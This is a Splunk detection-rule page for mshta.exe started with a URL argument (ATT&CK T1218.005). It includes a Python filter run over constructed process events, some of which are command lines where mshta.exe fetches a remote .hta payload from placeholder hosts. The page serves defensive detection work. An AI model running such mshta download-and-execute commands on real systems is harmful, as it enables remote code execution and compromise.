Detect MSHTA Url in Command Line

Splunk Security Content

Summary
This detection rule identifies instances where the Microsoft HTML Application Host (mshta.exe) is invoked with command-line parameters that include a URL. Using process telemetry from Endpoint Detection and Response (EDR) agents, Sysmon, and Windows Event Logs, the rule flags potentially malicious activity. Adversaries frequently misuse mshta.exe to download and execute remote .hta files, thereby circumventing standard security controls. The ability to download such payloads can lead to significant threats, including arbitrary code execution, system compromise, data theft, and further movement into the network. This detection rule allows security teams to monitor for and respond to such suspicious command-line executions effectively, reducing the risk of mshta.exe being used as a vector for malware delivery.
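As an added illustration (not part of the Splunk rule or of this page), the following Python filter applies the logic the summary describes to a few constructed process-creation events shaped like Sysmon Event ID 1 / Windows 4688 records; the field names, hosts, users and URLs are all assumptions.

```python
import re
from typing import Optional

# Constructed sample events (not real telemetry), normalised the way a SIEM
# would present Sysmon Event ID 1 / Windows 4688 process-creation records.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\alice", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.5/payload.hta"},
    {"host": "ws02", "user": "CORP\\bob", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\SysWOW64\\MSHTA.EXE",
     "cmdline": 'MSHTA.EXE "https://example.test/a.hta"'},
    {"host": "ws03", "user": "CORP\\carol", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe C:\\Users\\carol\\AppData\\Local\\Temp\\local.hta"},
    {"host": "ws04", "user": "CORP\\dave", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "cmdline": "firefox.exe https://example.test/"},
]

# A URL argument: scheme, "://", then everything up to whitespace or a quote.
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)


def is_mshta(image: str) -> bool:
    """True when the executed image's file name is exactly mshta.exe (case-insensitive)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() == "mshta.exe"


def extract_url(cmdline: str) -> Optional[str]:
    """Return the first http/https/ftp URL in a command line, or None if there is none."""
    match = URL_RE.search(cmdline)
    return match.group(0) if match else None


def detect(events):
    """Return one finding per event in which mshta.exe was started with a URL argument."""
    findings = []
    for ev in events:
        if not is_mshta(ev["image"]):
            continue
        url = extract_url(ev["cmdline"])
        if url is None:
            continue  # local .hta path: outside the scope of this rule
        findings.append({"host": ev["host"], "user": ev["user"], "parent": ev["parent"],
                         "url": url, "technique": "T1218.005"})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Only the first two constructed events produce findings: the third runs a local .hta file and the fourth is a browser, not mshta.exe.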
Categories
  • Endpoint
Data Sources
  • Windows Registry
  • Process
ATT&CK Techniques
  • T1218
  • T1218.005
Created: 2024-12-10